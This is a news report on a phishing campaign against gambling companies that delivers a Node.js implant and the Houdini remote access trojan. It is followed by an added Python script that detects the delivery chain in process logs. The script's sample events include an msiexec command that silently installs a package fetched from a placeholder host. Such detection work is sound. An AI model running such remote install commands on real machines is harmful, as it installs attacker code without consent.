A new cyber attack campaign has been targeting the gambling and gaming industries since at least September 2022 and is still underway, amid the preparations for the gaming industry trade fair event ICE London 2023 that is set to start on February 7th.
As soon as the customer service agent clicks on the purported screenshot link sent by the “customer”, either an LNK payload or a VBScript file is retrieved. Either one is configured to download and run an MSI package that delivers a Node.js implant.
Attackers Masked as Gambling Company Customers Get Access to Sensitive Internal Data
Once the VBScript (VBS) downloader is executed by the victim, the attack culminates in the deployment of Houdini, a VBS-based remote access trojan that was created back in 2013.
For the time being, the origins of the attackers remain unknown. According to the Security Joes report, the individuals posing as gambling operators’ customers and sending the VBS-based remote access trojan were observed using broken English when communicating with the companies’ customer service agents. Back in October 2022, MalwareHunterTeam shared some indicators of compromise linked to the campaign targeting gambling companies around the world.
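One way to hunt for the delivery chain described above (a script or shortcut that runs an MSI package, followed by a Node.js implant) in process-creation logs. This is an added example, not taken from the article or from the Security Joes report; the event format, host names, file paths, time window and sanctioned Node.js directory are all assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta
from ntpath import basename  # parses Windows paths on any OS

# Parents that run a .vbs file or are typical LNK targets (assumption).
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# Assumption: the only directory where Node.js is legitimately installed.
NODE_OK_DIRS = ("c:\\program files\\nodejs\\",)
WINDOW = timedelta(minutes=10)  # assumed correlation window

# Constructed events: (time, host, parent image, image, command line)
EVENTS = [
    ("2023-01-10T09:14:02", "CS-07", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\agent\Downloads\screenshot.vbs"'),
    ("2023-01-10T09:14:05", "CS-07", r"C:\Windows\System32\wscript.exe",
     r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i https://files.example.invalid/view.msi /qn"),
    ("2023-01-10T09:14:31", "CS-07", r"C:\Windows\System32\msiexec.exe",
     r"C:\Users\agent\AppData\Local\viewer\node.exe", "node.exe index.js"),
    ("2023-01-10T10:02:00", "DEV-03", r"C:\Windows\System32\cmd.exe",
     r"C:\Program Files\nodejs\node.exe", "node.exe server.js"),
    ("2023-01-10T11:30:00", "IT-01", r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
]

def name(path):
    return basename(path).lower()

def find_chains(events):
    """Return (host, msiexec_time, node_path) for each host where msiexec was
    started by a script host or shell and node.exe then ran from an
    unsanctioned directory within WINDOW."""
    hits, pending = [], {}
    for ts, host, parent, image, _cmd in sorted(events):
        t = datetime.fromisoformat(ts)
        if name(image) == "msiexec.exe" and name(parent) in SCRIPT_PARENTS:
            pending[host] = t  # stage 1: script-launched installer
        elif name(image) == "node.exe" and not image.lower().startswith(NODE_OK_DIRS):
            start = pending.get(host)  # stage 2: Node.js outside sanctioned path
            if start and t - start <= WINDOW:
                hits.append((host, start.isoformat(), image))
    return hits

if __name__ == "__main__":
    for hit in find_chains(EVENTS):
        print("suspicious chain:", hit)
```

Correlating by host and time rather than by parent process matters here because an MSI install often runs under the Windows Installer service, so the implant is not necessarily a direct child of the script that started it.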